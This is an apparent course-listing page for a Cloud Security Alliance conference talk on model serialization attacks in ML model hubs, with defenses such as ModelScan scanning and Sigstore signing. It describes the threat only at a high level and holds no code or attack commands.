Trojan Model Hubs - Hacking the ML Supply Chain and Defending Against Security Threats
Cloud Security Alliance via YouTube
Start speaking a new language. It’s just 3 weeks away.
Master Windows Internals - Kernel Programming, Debugging & Architecture
Overview
Google, IBM & Meta Certificates — All 10,000+ Courses at 40% Off
One annual plan covers every course and certificate on Coursera. 40% off for a limited time.
Get Full Access
Learn about critical security vulnerabilities in machine learning model hubs and essential defense strategies in this 26-minute conference talk from Cloud Security Alliance. Explore how public model repositories like Hugging Face can become vectors for Model Serialization Attacks (MSA), where malicious code is injected into model files to execute automatically during deserialization. Discover alarming statistics showing over 3,300 public models on Hugging Face capable of arbitrary code execution, with 41% going undetected by safety measures. Master two key defensive strategies using open-source tools: implement model scanning with ModelScan by Protect AI and utilize cryptographic signing with Sigstore by OpenSSF. Understand how these industry-standard security practices, while common in traditional software development, can be applied to protect AI/ML systems from compromised artifacts and unauthorized code execution.
Syllabus
Trojan Model Hubs: Hacking the ML Supply Chain & Defending Yourself from Threats
Taught by
Cloud Security Alliance